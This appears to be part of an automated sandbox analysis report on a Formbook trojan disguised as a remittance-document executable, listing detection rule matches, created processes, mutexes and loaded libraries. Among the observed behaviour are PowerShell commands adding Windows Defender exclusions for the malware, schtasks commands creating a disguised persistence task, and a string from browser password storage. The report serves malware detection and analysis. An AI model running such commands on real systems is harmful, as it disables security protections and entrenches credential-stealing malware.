            Source: 00000011.00000002.4495210628.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000012.00000002.4497473931.0000000005920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.4495268104.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000011.00000002.4493681409.0000000002D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.2334955851.0000000001C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.4495209551.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: GRogNEHvcL.exe.0.dr; Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, eQDLlF0mF1BvPPtfCH.cs; Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, eQDLlF0mF1BvPPtfCH.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, eQDLlF0mF1BvPPtfCH.cs; Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, eQDLlF0mF1BvPPtfCH.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, pEl1BokNiGulhgUCNc.cs; Security API names: _0020.SetAccessControl
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, pEl1BokNiGulhgUCNc.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3bb0150.5.raw.unpack, pEl1BokNiGulhgUCNc.cs; Security API names: _0020.AddAccessRule
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, pEl1BokNiGulhgUCNc.cs; Security API names: _0020.SetAccessControl
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, pEl1BokNiGulhgUCNc.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.3c33d70.4.raw.unpack, pEl1BokNiGulhgUCNc.cs; Security API names: _0020.AddAccessRule
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, eQDLlF0mF1BvPPtfCH.cs; Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, eQDLlF0mF1BvPPtfCH.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, pEl1BokNiGulhgUCNc.cs; Security API names: _0020.SetAccessControl
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, pEl1BokNiGulhgUCNc.cs; Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.4TH HIRE SOA REMITTANCE_USD280,000.exe.6b40000.9.raw.unpack, pEl1BokNiGulhgUCNc.cs; Security API names: _0020.AddAccessRule
            Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@23/16@15/13
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe; File created: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe; Mutant created: NULL
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe; Mutant created: \Sessions\1\BaseNamedObjects\WVXKpkRvKfhpxT
            Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4112:120:WilError_03
            Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1848:120:WilError_03
            Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7492:120:WilError_03
            Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe; File created: C:\Users\user\AppData\Local\Temp\tmp16FF.tmp
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe; Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe; File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: winver.exe, 00000011.00000002.4494261459.0000000003331000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4494261459.0000000003354000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2514621465.0000000003307000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000003.2514712647.0000000003327000.00000004.00000020.00020000.00000000.sdmp, winver.exe, 00000011.00000002.4494261459.0000000003327000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe; ReversingLabs: Detection: 42%
            Source: 4TH HIRE SOA REMITTANCE_USD280,000.exe; Virustotal: Detection: 54%
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe; File read: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe:Zone.Identifier
            Source: unknown; Process created: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp16FF.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe; Process created: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe "C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exe"
            Source: unknown; Process created: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe C:\Users\user\AppData\Roaming\GRogNEHvcL.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\GRogNEHvcL" /XML "C:\Users\user\AppData\Local\Temp\tmp30FF.tmp"
            Source: C:\Windows\SysWOW64\schtasks.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe; Process created: C:\Users\user\AppData\Roaming\GRogNEHvcL.exe "C:\Users\user\AppData\Roaming\GRogNEHvcL.exe"
            Source: C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe; Process created: C:\Windows\SysWOW64\winver.exe "C:\Windows\SysWOW64\winver.exe"
            Source: C:\Windows\SysWOW64\winver.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\4TH HIRE SOA REMITTANCE_USD280,000.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\GRogNEHvcL.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
